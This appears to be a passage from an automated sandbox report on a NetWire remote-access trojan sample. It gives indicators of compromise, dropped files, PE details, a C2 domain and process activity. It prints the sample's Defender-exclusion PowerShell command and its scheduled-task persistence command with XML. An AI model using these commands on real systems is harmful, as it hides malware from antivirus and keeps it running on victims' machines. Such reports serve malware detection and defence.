                                                        QZmwyW1zrWGet hashmaliciousBrowse
                                                        • 5.175.146.218
                                                        28043B9D96A6D54044950BCA23633AB601DCFDBE4305B.exeGet hashmaliciousBrowse
                                                        • 5.230.67.58
                                                        jKira.x86Get hashmaliciousBrowse
                                                        • 5.230.200.189
                                                        k8i7NOaW5v.exeGet hashmaliciousBrowse
                                                        • 5.230.71.130
                                                        y0DDiCq3yu.exeGet hashmaliciousBrowse
                                                        • 5.230.69.22
                                                        setup___pass_1234_activ.exeGet hashmaliciousBrowse
                                                        • 5.230.69.22
                                                        OGzexXUPE6.exeGet hashmaliciousBrowse
                                                        • 5.230.72.136
                                                        RPf57m26YR.exeGet hashmaliciousBrowse
                                                        • 5.230.72.136
                                                        IMAGE0113.exeGet hashmaliciousBrowse
                                                        • 109.205.178.244
                                                        NXp5nKLotAGet hashmaliciousBrowse
                                                        • 193.187.23.242
                                                        xn0eC7abrGGet hashmaliciousBrowse
                                                        • 94.249.139.110
                                                        1TJlbC5y7VGet hashmaliciousBrowse
                                                        • 5.230.200.181
                                                        CRokHpfu6UGet hashmaliciousBrowse
                                                        • 185.57.25.44
                                                        6ItFV4CEi3Get hashmaliciousBrowse
                                                        • 94.249.139.160
                                                        QgArQOctY9.exeGet hashmaliciousBrowse
                                                        • 109.205.178.244

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g94e4BgSRN.exe.log
                                                        Process:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):1396
                                                        Entropy (8bit):5.340178659145498
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4l:MIHK5HKXE1qHbHKnYHKhQnoPtHoxHhA9
                                                        MD5:200C45B4371C42E1EC65243C1288751B
                                                        SHA1:D381B575CBD94379873AA43DB07ED18BC6150C1A
                                                        SHA-256:953799E8B658D0797E82466EB482E238F9F73326F5B91D0503D3591DB58ED236
                                                        SHA-512:AAE09F52FAB534CDAC85BBD0A976BC01EDB7C958A0C1FB9C78BC76C82A24ACFBA7741001DB75ECED65309BA3799FCB526EBF9DA74CC3AAE0DB689CA0FF6EE892
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e08
                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):22280
                                                        Entropy (8bit):5.345158041308615
                                                        Encrypted:false
                                                        SSDEEP:384:z7tCDbeFrFiyHmz4sUunFrnVLf1JNcLnudlu5cuOhhjm1dOG06JaC:2eqrnln9XSrudl8cugjqB
                                                        MD5:7C2AF9AA7FC1BDF2B8BE132BFDEC1399
                                                        SHA1:70F809B8D4876D06AEAB6ADF1A9780BF0125134A
                                                        SHA-256:7DB5A3A99C17034A683F86EFFFB77073B9247DFFBD9E648AF78EB62E10E47003
                                                        SHA-512:49D5B634906670248C726F38C4D786AF89522ADFE976678A26F2DD8D890951BE40E285174BFFC1CA7D265DAA5E152879548A6504039359EF82548B440248478A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: @...e...........z.......h.P...........M...J..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrftyazc.eg3.ps1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview: 1
                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wv32y10w.3up.psm1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview: 1
                                                        C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
                                                        Process:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1600
                                                        Entropy (8bit):5.133278056985278
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qh/a1Kby1moqUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgeCaYrFdOFzOzN33ODOiDdKrsuTiv
                                                        MD5:74F8CF7052E31844E3352158FDC16419
                                                        SHA1:C86BF805FF74DF95045D87EEF800BB3F31088527
                                                        SHA-256:61B51A73F187A78F74AD533C8057C809173351B534B7FB90F5ED69FFFF117522
                                                        SHA-512:8C2C3FE1C6A1DCF32EF574DC61CFF031DCEE30BFA8BF2E61ACBCF1E22D0889756F094D7A826CEB5273A65EAD33C5A8B35A6ED9CA545D25C18E60BC71000E8A3A
                                                        Malicious:true
                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                        C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
                                                        Process:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):898560
                                                        Entropy (8bit):6.874832837426071
                                                        Encrypted:false
                                                        SSDEEP:24576:t6vaGtDTmitq1QqEGNCN/uVKTPLZsLkbR:tJGtOitq1QqFNGZTPWLE
                                                        MD5:D058C6416284F291D6BC7E183293DA1F
                                                        SHA1:9FE97AD0C11997B7C0CA5A43AFF43CC8BDB915B6
                                                        SHA-256:C47C4A57E7521C6886CA3764B32AD1E5D8669F2FBF6B127FE7A832F1F3B74EC5
                                                        SHA-512:13F733FC99E5FAEB274DD1480620194E88BE23D70FDC108C3846CF471760A21AC8606364ED930A187B62EBEDC25124488CB0557D1CED271AF982D50F52FC25CD
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0......"........... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B.......................H.......................p...............................................>..(...+.o(....*.0.............Y.+..*....0...................+...+..*..().......}.....~....%.X.....}.....s*...%.o+....}....*..().......{....}......{....}......{....(...+}....*..0..@.........{....~....%-.&~..........s,...%.....(...+(...+.{....(...+.+..*.0............{.....o0....+..*...0............{....(...+.+..*....0............{....o1....+..*>..{.....o2....*....0..&........r...p.{..........{.........(3..
                                                        C:\Users\user\AppData\Roaming\SiEKNQVnm.exe:Zone.Identifier
                                                        Process:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                        C:\Users\user\Documents\20220114\PowerShell_transcript.305090.zsWXEWae.20220114155525.txt
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):5795
                                                        Entropy (8bit):5.392253149129379
                                                        Encrypted:false
                                                        SSDEEP:96:BZO/fNnqDo1ZyZL/fNnqDo1ZRFfdjZ5/fNnqDo1ZfkNNDZo:r
                                                        MD5:A710E87EA4269CD157E421251E3052D7
                                                        SHA1:6FAF0121B75D400CDB4C8090989E93A6F3F50B7A
                                                        SHA-256:99BA73487367ACF1331EC08FFCD57E2565E37828AC3376BC16B50417AE998EB8
                                                        SHA-512:67D7F38C716ABA229FC7681D4641E24454A226C965C699B8DEA30452B9F50264D5EA0C16C0834744B3F3B042657EE4F21F32359E7EA41A237A0D033CEA2A3DF5
                                                        Malicious:false
                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114155526..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\SiEKNQVnm.exe..Process ID: 6780..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114155526..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\SiEKNQVnm.exe..**********************..Windows PowerShell transcript start..Start time: 20220114155929..Username: computer\user..RunAs User: computer\a

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.874832837426071
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:g94e4BgSRN.exe
                                                        File size:898560
                                                        MD5:d058c6416284f291d6bc7e183293da1f
                                                        SHA1:9fe97ad0c11997b7c0ca5a43aff43cc8bdb915b6
                                                        SHA256:c47c4a57e7521c6886ca3764b32ad1e5d8669f2fbf6b127fe7a832f1f3b74ec5
                                                        SHA512:13f733fc99e5faeb274dd1480620194e88be23d70fdc108c3846cf471760a21ac8606364ed930a187b62ebedc25124488cb0557d1ced271af982d50f52fc25cd
                                                        SSDEEP:24576:t6vaGtDTmitq1QqEGNCN/uVKTPLZsLkbR:tJGtOitq1QqFNGZTPWLE
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0......"........... ........@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:14b29272d9cce45b

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x49b00a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x61DB92BE [Mon Jan 10 01:58:22 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9afb80x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x41f0c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x9ae800x1c.text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x990100x99200False0.802077487245data7.52177326572IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x9c0000x41f0c0x42000False0.324503580729data4.42459351507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xde0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x9c1300x417e8data
                                                        RT_GROUP_ICON0xdd9180x14data
                                                        RT_VERSION0xdd92c0x3f4data
                                                        RT_MANIFEST0xddd200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright P4 Tecnologia e Desenvolvimento Humano Ltda. 2006
                                                        Assembly Version1.0.0.0
                                                        InternalNameSoapInteg.exe
                                                        FileVersion1.0.0.0
                                                        CompanyNameP4 Tecnologia e Desenvolvimento Humano Ltda.
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameCsDO.CodeGenerator
                                                        ProductVersion1.0.0.0
                                                        FileDescriptionCsDO.CodeGenerator
                                                        OriginalFilenameSoapInteg.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        01/14/22-15:55:34.288950UDP254DNS SPOOF query response with TTL of 1 min. and no authority53654478.8.8.8192.168.2.5

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 14, 2022 15:55:34.316488028 CET497586688192.168.2.5109.205.178.244
                                                        Jan 14, 2022 15:55:34.350246906 CET668849758109.205.178.244192.168.2.5
                                                        Jan 14, 2022 15:55:34.350370884 CET497586688192.168.2.5109.205.178.244
                                                        Jan 14, 2022 15:55:34.350713968 CET497586688192.168.2.5109.205.178.244
                                                        Jan 14, 2022 15:55:34.406541109 CET668849758109.205.178.244192.168.2.5
                                                        Jan 14, 2022 15:55:34.412012100 CET497586688192.168.2.5109.205.178.244
                                                        Jan 14, 2022 15:55:34.492788076 CET668849758109.205.178.244192.168.2.5
                                                        Jan 14, 2022 15:56:14.379271984 CET668849758109.205.178.244192.168.2.5
                                                        Jan 14, 2022 15:56:14.379663944 CET497586688192.168.2.5109.205.178.244
                                                        Jan 14, 2022 15:56:14.458499908 CET668849758109.205.178.244192.168.2.5
                                                        Jan 14, 2022 15:57:14.727015972 CET668849758109.205.178.244192.168.2.5
                                                        Jan 14, 2022 15:57:14.727893114 CET497586688192.168.2.5109.205.178.244
                                                        Jan 14, 2022 15:57:14.808500051 CET668849758109.205.178.244192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 14, 2022 15:55:34.180125952 CET6544753192.168.2.58.8.8.8
                                                        Jan 14, 2022 15:55:34.288949966 CET53654478.8.8.8192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jan 14, 2022 15:55:34.180125952 CET192.168.2.58.8.8.80xfa76Standard query (0)podzeye.duckdns.orgA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jan 14, 2022 15:55:34.288949966 CET8.8.8.8192.168.2.50xfa76No error (0)podzeye.duckdns.org109.205.178.244A (IP address)IN (0x0001)

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: g94e4BgSRN.exe PID: 6384 Parent PID: 6140

                                                        General

                                                        Start time:15:55:13
                                                        Start date:14/01/2022
                                                        Path:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\g94e4BgSRN.exe"
                                                        Imagebase:0x270000
                                                        File size:898560 bytes
                                                        MD5 hash:D058C6416284F291D6BC7E183293DA1F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000000.00000002.287524308.0000000003873000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: powershell.exe PID: 6780 Parent PID: 6384

                                                        General

                                                        Start time:15:55:23
                                                        Start date:14/01/2022
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
                                                        Imagebase:0x380000
                                                        File size:430592 bytes
                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 6788 Parent PID: 6780

                                                        General

                                                        Start time:15:55:24
                                                        Start date:14/01/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7ecfc0000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: schtasks.exe PID: 6796 Parent PID: 6384

                                                        General

                                                        Start time:15:55:24
                                                        Start date:14/01/2022
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
                                                        Imagebase:0xb0000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 6920 Parent PID: 6796

                                                        General

                                                        Start time:15:55:25
                                                        Start date:14/01/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff797770000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: g94e4BgSRN.exe PID: 6976 Parent PID: 6384

                                                        General

                                                        Start time:15:55:26
                                                        Start date:14/01/2022
                                                        Path:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        Imagebase:0xbd0000
                                                        File size:898560 bytes
                                                        MD5 hash:D058C6416284F291D6BC7E183293DA1F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.280983052.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.281635680.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.283998783.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.276611463.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000009.00000000.279964505.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

